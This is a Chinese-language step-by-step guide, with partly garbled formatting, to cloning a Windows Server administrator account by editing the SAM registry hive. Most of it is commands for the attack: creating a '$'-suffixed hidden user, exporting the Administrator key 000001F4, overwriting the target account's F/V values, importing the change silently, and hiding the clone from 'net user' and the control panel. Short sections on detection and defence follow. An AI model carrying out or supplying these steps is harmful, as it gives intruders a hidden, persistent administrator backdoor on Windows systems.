Windows Server管理员账户克隆的核心原理是通过修改注册表项,将目标账户的权限属性(F/V值)替换为管理员账户的对应值,从而实现权限继承。以下是具体操作步骤及注意事项:
权限获取
regedit或regedt32,找到路径 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users。SAM项,赋予当前用户完全控制权限以解除默认锁定。目标账户创建
Guest或自定义隐藏用户),示例命令:
net user test$ Password123 /add
net localgroup administrators test$ /add # 赋予管理员权限(可选)
定位管理员账户键值
000001F4(对应Administrator的SID)。000003E9(对应Guest或其他用户的SID)。导出并修改注册表项
.reg文件:
regedit /e admin.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4"
000001F4替换为目标账户的键值(如000003E9),并保存。导入并覆盖目标账户
.reg文件导入注册表,或通过命令行:
regedit /s modified.reg
F和V值,而简单克隆仅替换F值。权限验证
shutdown命令或访问受限资源)。wmic useraccount get name,sid检查账户SID是否显示为管理员属性。隐蔽性处理
$符号(如test$),避免在net user或控制面板中显示。net user test$ /del # 删除原始账户(需在导入注册表后操作)
检测方法
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users中异常键值。D盾或Process Explorer检测隐藏/克隆账户。防御措施
SAM项的写入权限。事件ID 4720(账户创建)和事件ID 4624(登录记录)。系统兼容性
风险提示
SAM注册表项或使用reg export导出原始配置。